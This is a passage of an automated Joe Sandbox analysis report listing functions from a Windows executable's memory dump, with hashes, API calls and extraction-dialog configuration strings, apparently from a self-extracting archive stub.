                                                                                                                                              • Opcode ID: affc3d924cbb22dbc8a8eb6dcc758eac178c594c13a1fc9b1d19a5378a6d4425
                                                                                                                                              • Instruction ID: 25a249254e8626257cc3941788dbc5eada97b48c2c5fa8906ab10203577a698d
                                                                                                                                              • Opcode Fuzzy Hash: affc3d924cbb22dbc8a8eb6dcc758eac178c594c13a1fc9b1d19a5378a6d4425
                                                                                                                                              • Instruction Fuzzy Hash: 5301FB72224941CBE711CF7AE848B5AB7B1F3DCB9AF184118EB4987668CF3DD8458B00
                                                                                                                                              APIs
                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE(?,?,?,?,00000001400028D4), ref: 0000000140002740
                                                                                                                                              • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,00000001400028D4), ref: 0000000140002760
                                                                                                                                              • GetSystemDefaultLCID.KERNEL32(?,?,?,?,00000001400028D4), ref: 000000014000276C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Default$LanguageSystem$User
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3651142734-0
                                                                                                                                              • Opcode ID: aeda2a999ae0fd85cb3ab0dfde365f297e0d8b7c737a0b1af27e0b6d0465526c
                                                                                                                                              • Instruction ID: 190b127eaf96d4dd4e8ea8473f1168bc35628f62c0060ec639a7b95baad9ce91
                                                                                                                                              • Opcode Fuzzy Hash: aeda2a999ae0fd85cb3ab0dfde365f297e0d8b7c737a0b1af27e0b6d0465526c
                                                                                                                                              • Instruction Fuzzy Hash: 46F05878109126C6F227AB93A9447F422A2E77CBD1FC0005AF78A832B4EB3C08959321
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: 3aac621b68b07f3b57dba174d9674d7cc9cd50848231fc572d3e25ff1deff6f7
                                                                                                                                              • Instruction ID: 9a1577d38859e20e451d6d5e431b402394783ca76725f78b20535ee69fd3f8d0
                                                                                                                                              • Opcode Fuzzy Hash: 3aac621b68b07f3b57dba174d9674d7cc9cd50848231fc572d3e25ff1deff6f7
                                                                                                                                              • Instruction Fuzzy Hash: FB113C72215B8492DA51DB52F1507AEA3A0FB9CBD0F444121FF8E47B6ADF3CCA118B00
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HookUnhookWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2953937349-0
                                                                                                                                              • Opcode ID: 654adc1313417019bccd528d387c3d60d6330da7957a6f19a095ad939971c6c1
                                                                                                                                              • Instruction ID: 1018a95cfd4037db7c476be7ae8fd58fd2808c3bda652bfad82ce8d172b24bb5
                                                                                                                                              • Opcode Fuzzy Hash: 654adc1313417019bccd528d387c3d60d6330da7957a6f19a095ad939971c6c1
                                                                                                                                              • Instruction Fuzzy Hash: 290100B1A1590581FB57DB7BE459BA826E1B79CFC5F244119EB0A07AB4CF3D88889301
                                                                                                                                              APIs
                                                                                                                                              • ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
                                                                                                                                              • ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1936579350-0
                                                                                                                                              • Opcode ID: 00f5bfec8f2973510a70e04d8c6b90affda05a7dc7244f1981567c3564593c9a
                                                                                                                                              • Instruction ID: 16ab32281b0e81d586dab6da12a9bb12729ce1ac4471678eb6853d3bd0cedf31
                                                                                                                                              • Opcode Fuzzy Hash: 00f5bfec8f2973510a70e04d8c6b90affda05a7dc7244f1981567c3564593c9a
                                                                                                                                              • Instruction Fuzzy Hash: 8A01447761165082D750CF2AE1413A9B3A1E788FE5F04C225FB694B7A9DA39D491CB10
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1936579350-0
                                                                                                                                              • Opcode ID: 6b5ef724ae6a0eac0edbe87fd7025419717aa064e8b158735b995c3ec93ade3b
                                                                                                                                              • Instruction ID: c7ab9152159ff5f37ca87f1a7527b63c5ec991ea54dfb7095fd8723091e79144
                                                                                                                                              • Opcode Fuzzy Hash: 6b5ef724ae6a0eac0edbe87fd7025419717aa064e8b158735b995c3ec93ade3b
                                                                                                                                              • Instruction Fuzzy Hash: 75014F73614A9086E751CF26E1913ADB761F788FC8F18C111EB450B76ACB39D491CB51
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1669990519-0
                                                                                                                                              • Opcode ID: c210a7b96be3e655390864a15481e134adef30af6a3fce6d6f267cfa016679bf
                                                                                                                                              • Instruction ID: 1b5356ec7834afda68c72fe78e66cdc0a1edda5700413894b005cad0b4e30c2c
                                                                                                                                              • Opcode Fuzzy Hash: c210a7b96be3e655390864a15481e134adef30af6a3fce6d6f267cfa016679bf
                                                                                                                                              • Instruction Fuzzy Hash: 24F0BD76A1479087D710CF5AF44064AB7A0F7DCBA4F144115EF8993B28DB38D8418F00
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                              • Opcode ID: 4ee347a0d6b513108994db27ae333fb9378cbe95e8776ad17626e7710a99fe25
                                                                                                                                              • Instruction ID: df4dd4b29a9d1a31a50ec4219ab77e799869cd907522f9456712e432f6790838
                                                                                                                                              • Opcode Fuzzy Hash: 4ee347a0d6b513108994db27ae333fb9378cbe95e8776ad17626e7710a99fe25
                                                                                                                                              • Instruction Fuzzy Hash: B1E09276610B44C1DB528F63E4807EA73A4E7ACBD0F245111FB6B4B7B4DA39C490C700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Dialog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1120787796-0
                                                                                                                                              • Opcode ID: 25a9e53d3a1eeb5691a451dc41179ffb9d22a845c962607fad3c1796c8f0dd73
                                                                                                                                              • Instruction ID: c7c8b73da5189dd947dca57d55429c82a3b1103dcb85d16ac3d7acec8ac49e13
                                                                                                                                              • Opcode Fuzzy Hash: 25a9e53d3a1eeb5691a451dc41179ffb9d22a845c962607fad3c1796c8f0dd73
                                                                                                                                              • Instruction Fuzzy Hash: 44E0EDB5644540C5E6779B3BD9483AC27A9EBC8F88F548043E70A07AB8CA39C959D201
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemShowWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3351165006-0
                                                                                                                                              • Opcode ID: f0d5a292a47fe20b488e9f3b8523a3443fcadbaf93dc11936e3baec2ade07428
                                                                                                                                              • Instruction ID: 5a2b2d7995c8c25e6d6664f7dded4284b24ff049640b34c385503f1cdc76f2c6
                                                                                                                                              • Opcode Fuzzy Hash: f0d5a292a47fe20b488e9f3b8523a3443fcadbaf93dc11936e3baec2ade07428
                                                                                                                                              • Instruction Fuzzy Hash: 17E0CD71612048C2FF169B67E4403B451A0D79CB86F484034E70D47370DB3C8CC58300
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3498533004-0
                                                                                                                                              • Opcode ID: e5655017f384219c540a5971092374d116225c755aa00284c0d34560810466bc
                                                                                                                                              • Instruction ID: ec9a40f5e83df9f02a96987701a0a6f7619ab68c428aaff9387cafacd6d5b1ff
                                                                                                                                              • Opcode Fuzzy Hash: e5655017f384219c540a5971092374d116225c755aa00284c0d34560810466bc
                                                                                                                                              • Instruction Fuzzy Hash: 13014F32614B9087D7509F56B44165AB7A5F788BE0F144329FFA903BA5CB78D851CB04
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
                                                                                                                                                • Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8
                                                                                                                                              • SetWindowTextW.USER32 ref: 000000014000B3E6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@TextWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 890632301-0
                                                                                                                                              • Opcode ID: a9c589b876e61ac9cbc79bf36dc34da44af35a83a88b0502e37edf32f8eb48d4
                                                                                                                                              • Instruction ID: 4c12c7b822857049e70f90d90bc47868fbed6d249025324668aac4f618e2eb3d
                                                                                                                                              • Opcode Fuzzy Hash: a9c589b876e61ac9cbc79bf36dc34da44af35a83a88b0502e37edf32f8eb48d4
                                                                                                                                              • Instruction Fuzzy Hash: 60016DF6714A4082EB16DF13E0543FDA3A1B79CBD5F248021EF59077A6CB78C9508B00
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              • Opcode ID: eef78d432fb0b3de7e886bfff85a5e8dc7997e8419b81ee5360f3ceb8428fc01
                                                                                                                                              • Instruction ID: e473bed060fa2958e53642e57d6aea91d107be03ec3665cdc42f83726ebf7ed7
                                                                                                                                              • Opcode Fuzzy Hash: eef78d432fb0b3de7e886bfff85a5e8dc7997e8419b81ee5360f3ceb8428fc01
                                                                                                                                              • Instruction Fuzzy Hash: 23D01772624984CBE7019FA1E44476AF764F398BA5F084019EA898A664CBBDC4D9CB00
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionHandlerVectored
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3310709589-0
                                                                                                                                              • Opcode ID: 8e1a7f3da97cf8c973d4d16f9f3fa5ef4159b04a4b37ff9b0ef211642af0c7cb
                                                                                                                                              • Instruction ID: 46f33ad93f94745197980974301b10bf800fa33eec472c7351be820d734fba3d
                                                                                                                                              • Opcode Fuzzy Hash: 8e1a7f3da97cf8c973d4d16f9f3fa5ef4159b04a4b37ff9b0ef211642af0c7cb
                                                                                                                                              • Instruction Fuzzy Hash: 24C02BB0700204C1FF1A0BF3B4413D412219B6C7C0F485025DE160F320C93CC0EE8310
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 000000014000BE00: GetModuleHandleW.KERNEL32 ref: 000000014000BE3E
                                                                                                                                                • Part of subcall function 000000014000BE00: LoadIconW.USER32 ref: 000000014000BE4A
                                                                                                                                                • Part of subcall function 000000014000BE00: GetSystemMetrics.USER32 ref: 000000014000BE57
                                                                                                                                                • Part of subcall function 000000014000BE00: GetSystemMetrics.USER32 ref: 000000014000BE63
                                                                                                                                                • Part of subcall function 000000014000BE00: GetModuleHandleW.KERNEL32 ref: 000000014000BE6D
                                                                                                                                                • Part of subcall function 000000014000BE00: LoadImageW.USER32 ref: 000000014000BE88
                                                                                                                                                • Part of subcall function 000000014000BE00: SendMessageW.USER32 ref: 000000014000BEA8
                                                                                                                                                • Part of subcall function 000000014000BE00: SendMessageW.USER32 ref: 000000014000BEBA
                                                                                                                                                • Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BED9
                                                                                                                                                • Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BEEB
                                                                                                                                                • Part of subcall function 000000014000BE00: GetWindowLongPtrW.USER32 ref: 000000014000BEFE
                                                                                                                                                • Part of subcall function 000000014000BE00: SetWindowLongPtrW.USER32 ref: 000000014000BF11
                                                                                                                                                • Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BF22
                                                                                                                                                • Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BF31
                                                                                                                                                • Part of subcall function 000000014000BE00: GetWindowLongPtrW.USER32 ref: 000000014000BF3F
                                                                                                                                                • Part of subcall function 000000014000BE00: SetWindowLongPtrW.USER32 ref: 000000014000BF52
                                                                                                                                                • Part of subcall function 000000014000BE00: GetDlgItem.USER32 ref: 000000014000BF65
                                                                                                                                                • Part of subcall function 000000014000BE00: SetWindowTextW.USER32 ref: 000000014000BF74
                                                                                                                                              • MessageBeep.USER32 ref: 000000014000C242
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemWindow$Long$Message$HandleLoadMetricsModuleSendSystem$BeepIconImageText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2380859652-0
                                                                                                                                              • Opcode ID: 2ebb189a79c8966759d7510658cc4c7924ef3ca79fa8152c6d4c83d99e019bb8
                                                                                                                                              • Instruction ID: 295fe7b416e5ad8808bad6b33e9da75d733f2d3b1b41b7b291ad4d37789fa474
                                                                                                                                              • Opcode Fuzzy Hash: 2ebb189a79c8966759d7510658cc4c7924ef3ca79fa8152c6d4c83d99e019bb8
                                                                                                                                              • Instruction Fuzzy Hash: 14B01270F2104982E70933F39C423C900D16BDC360FC00434F305472A2CCBC04D60761
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                              • Opcode ID: 9e1b5a5441cfe979a60c43ca17f5716e446d2ef4cb9be45658bc37e564c8edbd
                                                                                                                                              • Instruction ID: ea208fe4c2d5f8ad3b6a06394e00168be74d69f9d3124f20a441e9903277690f
                                                                                                                                              • Opcode Fuzzy Hash: 9e1b5a5441cfe979a60c43ca17f5716e446d2ef4cb9be45658bc37e564c8edbd
                                                                                                                                              • Instruction Fuzzy Hash: ABF0BB32314140C2D721AFAEA4507E952E1B74D7C5F544436FB8A8F675D57ACC948504
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                              • Opcode ID: 8ab46a8bd00273c70218c1dc97830c9414643ab9b69535534f1709d71204f958
                                                                                                                                              • Instruction ID: cfd82f93e4b8cfeecb5b4b0f4733c358cacdcf1b10a505f609da48a5778a7b4e
                                                                                                                                              • Opcode Fuzzy Hash: 8ab46a8bd00273c70218c1dc97830c9414643ab9b69535534f1709d71204f958
                                                                                                                                              • Instruction Fuzzy Hash: D5F02732324180CBD781EFEAA4803E962D0B79CBC1F941035FB878F676D679CC848644
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$_wtol$??2@EnvironmentVariablelstrcmpi$??3@ByteCharInfoLocaleMultiWidelstrlenwsprintf
                                                                                                                                              • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
                                                                                                                                              • API String ID: 23300869-1675048025
                                                                                                                                              • Opcode ID: 061ec2ddd1bf58f7a21bf0a088d2c1d6027e84a2573e8fc46ef1f38966f27576
                                                                                                                                              • Instruction ID: 4ce12572129288b569918d904226091ecbf46c86c7c6652df9b93c5c15f35cb3
                                                                                                                                              • Opcode Fuzzy Hash: 061ec2ddd1bf58f7a21bf0a088d2c1d6027e84a2573e8fc46ef1f38966f27576
                                                                                                                                              • Instruction Fuzzy Hash: ED7119B1315B4191FE47EB67B865BD82395AB4E7D0F94642DBA0E07B71EE3CC8848700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
